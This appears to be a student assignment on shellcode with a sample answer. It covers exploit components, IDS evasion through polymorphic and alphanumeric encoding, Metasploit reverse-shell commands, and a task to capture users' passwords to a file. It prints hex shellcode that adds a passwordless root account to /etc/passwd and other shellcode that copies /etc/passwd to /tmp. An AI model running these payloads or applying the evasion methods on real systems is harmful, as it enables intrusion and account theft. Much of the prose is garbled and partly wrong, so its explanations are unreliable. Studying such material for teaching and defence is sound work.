Understanding Shellcode And Its Application In Hacking Platforms

Part A

 

Students are required to answer research questions based on three academic papers:

“The Shellcode Generation”
“Evasion Techniques”
“English Shellcode”

 

There should be at least four additional references from recent academic (IEEE or ACM) research papers or white papers from IT companies. Students must perform their own research for additional references.

 

1. In the paper “The Shellcode Generation”, what is the development bottom-line for an exploit? List and give detailed explanations to the three components for a usable exploit.

2. Read the paper “Evasion Techniques”, and explain how a piece of shellcode can bypass an intrusion detection system. more information about the shellcode issues related to computer forensic investigations

3. Read the paper “English Shellcode”, explain the concept of program counter and its importance to an attacker who uses shellcodes.

4. In the paper “English Shellcode”, what are the two advantages of using alphanumeric encoding engines to generate shellcode?

Part B

Suppose you are working for an IT security company which is subcontracted by Deakin University to test the system security of the campus network. Your manager wants you to attempt to write shellcode which takes a user’s account name and his/her password and stores the information as plain text in a text file called user.dat in the user’s current directory.

 

Requirements

 

1. You should implement a C program to ask a user to type his username and password one a command line input (i.e., from the standard input channel).

2. Your program should demand at least two user attempts of inputting the passwords. That is, your program should only terminate when the user has entered two identical passwords.

3. Your program should store the username and password pair into a text file called user.dat in the current directory.

4. You should package your C code into a shellcode by using Shellforge

Part C

You need to write an essay to demonstrate your level of understanding about shellcode and its application on hacking platforms, operating systems vulnerability, penetration testing and exploitation. Your essay should consist of the following parts:

1. List and explain every command used in the metasploit demo

2. Identify the name of the shellcode used in the demo, reproduce its contents in hex and provide a screen capture of it in your essay, and explain what this shellcode is capable of doing.

3. Find and list at least five different shellcode-generating approaches. Then compare the advantages anddisadvantages from the viewpoint of attackers.

4. Describe the concept of polymorphic shellcode. And discuss the impact of misusing penetration toolkits
such as Metasploit for malicious purposes.

Shellcode can be defined as an arrangement of directions for the processor infused and after that executed by an exploited program. Shellcode is utilized to specifically control registers and the usefulness of a compromised application program [4]. shell codes can be composed in high level programming languages but in some certain scenarios or states state dialect yet would tell they may not work as intended, so low level assembly language is favoured for shellcode generation.

For any exploitation the bottom line of an attack can be listed as the severity of the flaws in the application or network gateway that is going to be exploited [4]. The impact of any exploitation based attack depends on the successful exploitation of the found vulnerability. With a detailed vulnerability scanning of the targeted machine or the application can help in the successful completion of the exploitation attack.

The main three components of any exploitation attack are listed as the vector used for the attack, technique used for the exploitation and lastly the payload determined for the attack.  

Attack vector: An attack vector is considered as the technique or means for a hacker through which the attacker can have access to some targeted computer or some targeted network. In this way the attacker delivers some specific payload or malicious code segment.  Use of the attack vectors helps the attacker/hackers in order to exploit scanned vulnerabilities of a system or network server.   

 These attack vectors include shellcodes, e-mail attachments, viruses, pop-up windows, chat rooms, instant messages and so on. Most of these used vectors are software components or, in some cases hardware components. In this exploitation attacks, the users are deceived by exploiting the system vulnerabilities by using the different components such as shellcode.

Up to some extent, antivirus applications/firewalls applications are able to block some of the attack vectors from getting into the system or network [5].  For exploitation attack A defence method which considered as effective for some time but may not remain effective for always. The reason behind this can be stated as the attackers constantly changing and updating vectors using new techniques in order to gain unauthorized access to targeted servers, networks or workstations inside the network.

Technique used for exploitation:

Payload for the attack:  Exploit payload is the functional component for any exploitation based attack.  Usually for any kind of attack payloads includes bind, reverse shells or the meterpreter shell. Payload in the exploitation attack refers to the part of virus/malware or any cyber worm which is mainly responsible for the completion of malicious action on the victim machine/network.

There are three types payloads that are used in the attacks.  These are Stagers, Stages and singles.

Stagers: This kind of payloads are small in size and are mainly intended establish communication among the victim machine and attacker machine. After establishing the communication, the process moves to next stage. Established communication channel between the attacker and target machine is very reliable. This kind payload is helpful for the attackers to re-use the codes developed for an attack [1]. The reason behind this reusability is separation of the establishment of the communication channel from actual attacking stage.

Stages:  This type of payload modules are downloaded by the Stagers part. As the Stager takes care of communication channel the Stages payloads are often larger in size while having various options for delivering the payload and carrying out the option.

Single: These type of payload is self-contained but they are not connected to any other module.  The main intention behind these payloads is establishing communications among the victim machine and attacker machine using Metasploit [3].

Exploitation technique:  The attack algorithm is known as the exploitation technique used for the vulnerable exploitation attack.

Most of intrusion detection systems are dependent on the pre-defined signatures of different malwares, shell codes or viruses [4].  In order evade the IDS or the intrusion detection systems one of the best and popular methods are use of polymorphic shell codes.  Polymorphism is a strategy to transform the malicious code to be represented in different manner unique each time it is run, yet despite everything it works in the same manner in which it may have done before the transformation.

With the use of polymorphism, attackers avoid the detection process of IDS since they try to get a match with the predefined signatures which does not match for a shellcode after its transformation [1]. Polymorphic engines are utilized to make a polymorphic shellcode.

In computing technology, the program counter can be defined as a special kind of the register that keeps track of the next instruction of an application that is going to be executed by the processing unit.

 Both data and application instructions have a memory address on the memory of the system. This data and instructions are fetched from the memory location by the program counter and consecutively are executed by the processing unit.

At any certain point when some instruction is executed by the processing unit the concerned application refreshes the program counter with the following directions deliver that will be fetched from memory and executed next in turn [4]. In the following stage program counter sends the data to memory address enlist as a piece of execution cycle. Along these lines program counter raises value of the instruction counter by one for the following activity.

 The attackers can exploit any vulnerability of the targeted machine or server through the control flow hijacking process [2]. In this process the attacker gains controls over the program counter and can redirect the flow of execution of instructions in such a way that the flow of the control so that it can help in desired action by the targeted machine or server

 Following are the advantages of the using alphanumeric engine for generating shellcode compared to any other engine.

1. In order to begin with the advantages, alphanumeric shellcodes generated using the alpha numeric engine can be saved in generally unsuspected context and atypical format for example, use of valid directory and file name or client passwords for a system. Moreover, the alphanumeric character set is essentially smaller when compared to the characters accessible in UTF-8 and Unicode encoding formats [2]. This implies that the shellcodes forming with the alphanumeric shellcode is very less when compared to the ordinary shellcode that are injected to the application or network.
2. Use of the shell codes generated using the alphanumeric engines helps in avoiding the monitoring tools (intrusion prevention system and intrusion detection system) [5]. As this tools detects the malware or worms depending upon certain signatures and the shellcodes from alphanumeric shellcode lacks those signatures thus leading to failure to detect the shellcode.  

xB8x04x00x00x00xBBx01x00x00x00x8B

x0Dx00x00x00x00xBAx13x00x00x00xCD

x80xB8x03x00x00x00xBBx01x00x00x00x8B

x0Dx00x00x00x00xBAx17x00x00x00xCDx80

xB8x04x00x00x00xBBx01x00x00x00x8Bx0D

x00x00x00x00xBAx17x00x00x00xB8x01x00

x00x00xBBx00x00x00x00xCDx80

 x6ax05x58x31xc9x51x68x73x73x77x64x68

x2fx2fx70x61x68x2fx65x74x63x89xe3x66

xb9x01x04xcdx80x89xc3x6ax04x58x31xd2

x52x68x30x3ax3ax3ax68x3ax3ax30x3ax68

x72x30x30x74x89xe1x6ax0cx5axcdx80x6a

x06x58xcdx80x6ax01x58xcdx80

Identification: Above shellcode is helpful in creating a  root privileged user in the Linux system with the user name r00t without any password. The new data is saved in /etc/passwd directory.  

x31xc0xb0x05x31xc9x51x68x73x73x77x64

x68x63x2fx70x61x68x2fx2fx65x74x8dx5c

x24x01xcdx80x89xc3xb0x03x89xe7x89xf9

x66x6axffx5axcdx80x89xc6x6ax05x58x31

xc9x51x68x66x69x6cx65x68x2fx6fx75x74

x68x2fx74x6dx70x89xe3xb1x42x66x68xa4

x01x5axcdx80x89xc3x6ax04x58x89xf9x89

xf2xcdx80x31xc0x31xdbxb0x01xb3x05xcd

x80

Identification: The given shellcode is helpful for the attacker’s in copying all the data from the /etc/passwd directory to the /tmp/outfile. In this way the attacker can have better accessibility to all the user account as the password data is stored in the outfile which can be exploited by the attacker.

The first command which is used is “msfconsole” which is used for getting into any metasploit console. After that “show exploit” commands are there which is used for available exploits from any kind of machine hacking.

In the provided attack, “metasploit/multi/ handler” is used by attacker for create and establishing connection to victim machine. After that “set PAYLOAD windows/meterpreter/reverse_tcp” is used for setting payload for the attack. The following command “msfvenom –p windows/meterpreter/reverse_tcp LHOST address” is used between victim and attacker which is mainly assigned to specific ports which are carryout as per the payload. In this whole mechanism or process LHOST is taken to be IP address of the given machine. Since both the given network works in same network, then it is likely that target machine to reach out of the given attacker mechanism to work in the same given network. The next step or stage in this SET LPORT: in the port the victim machine gets attack when target has established a connection with the machine [4]. The next stage is backdoor file that window machine can be achieve by enclosing it with proper password and message.

For the provided attack the reverse shell code can be used for exploiting the target. Reverse shell a type of shell in which target machine is convey back to the attacking machine. Attacking machine comes ups with a port with which it is associated and it utilizes various kinds of execution which needs to completed.

There are large number of methods which are used for generation of shellcode. A list has been provided like:

PWNtools: It is considered to be an essential part of CFT framework. This type of Shellcodes is used for exploiting the development library for any given framework. This particular tool is developed by the help of Python language. It is developed in such a way that is can provide rapid development along with prototyping [2]. It mainly comes up with many features or benefits but it is only used in the generation of shellcode. This particular module aims in development of assembly code which can be achieved by NASM which makes use of python language [1]. PWNtools does need any attacker to have an idea regarding the assembly to create shell. Different application provides tools which is helpful to write shellcodes in much better and faster way.

NASM: It is considered as the most basic kind of approach which is helpful in generation of Shellcodes. It aims in creation of shellcode which is achieved by assembly code.

Shellforge: It is developed by the help of Python language and comes up with ability to develop shellcodes by the help of C programming language.

Synesthesia approach:  Compared to other approaches, thus approach is most recent one. This approach includes the following restrictions that makes the shellcodes more capable of hiding from the different monitoring tools [3]. The limitations of this approach are provided below;

No NULL bytes are allowed in the shellcode, used every ASCII letter converted to the uppercase. In order to make the shellcode more reliable and this technique uses format string Using the “%” character dicey.

All the bytes in the shell code must be printable (as well as Bytes must be alphanumeric) for escaping the IDS.

Use of msfvenom: Another approach that is popular in generating the shell codes is use of msfvenom available from the metasploit platform.  Shellcodes developed in this approach includes only ASCII characters used in the exploitation.  

The benefit of this solution is that we have not write by anything. We have make use of shellcodes which are predefined for any platforms. For NASM, the biggest disadvantage is that the tool is not useful for generation of any shellcode for other platforms like android.

It is a well-known technique which mainly encodes a shellcode and responsible for any kind of exploitation vulnerability into polymorphism structure. It is shellcode which is indicated by the given marks. Polymorphism is considered to be the best technique for the above situation [5]. An attacker can easily scramble or pack the given shellcode and then after that it prepend a proper bit code which is decompressed in the given adventure. As the mark for shellcode cannot be reflected in the given polymorphic frame, then IPS can easily fail to figure out.

[1] J. Mason, S. Small, F. Monrose and G. MacManus, “English shellcode.” , In Proceedings of the 16th ACM conference on Computer and communications security .  pp. 524-533, 2009.

[2]T. Cheng, Y. Lin, Y. Lai and P. Lin, "Evasion Techniques: Sneaking through Your Intrusion Detection/Prevention Systems", IEEE Communications Surveys & Tutorials, vol. 14, no. 4, pp. 1011-1020, 2012.

[3]K. Iwamoto and K. Wasaki, "A Method for Shellcode Extractionfrom Malicious Document Files Using Entropy and Emulation", International Journal of Engineering and Technology, vol. 8, no. 2, pp. 101-106, 2016.

[4]T. Okamoto, "SecondDEP: Resilient Computing that Prevents Shellcode Execution in Cyber-Attacks", Procedia Computer Science, vol. 60, pp. 691-699, 2015.

[5]M. Chen, C. Hu, D. Tian, X. Wang, Y. Liu and N. Li, "Shellix: An Efficient Approach for Shellcode Detection", International Journal of Security and Its Applications, vol. 10, no. 6, pp. 107-122, 2016.

[6]T. Lu, L. Zhang and Y. Fu, "A Novel Immune-Inspired Shellcode Detection Algorithm Based on Hyperellipsoid Detectors", Security and Communication Networks, vol. 2018, pp. 1-10, 2018.

[7]I. Arce, "The shellcode generation", IEEE Security & Privacy Magazine, vol. 2, no. 5, pp. 72-76, 2004.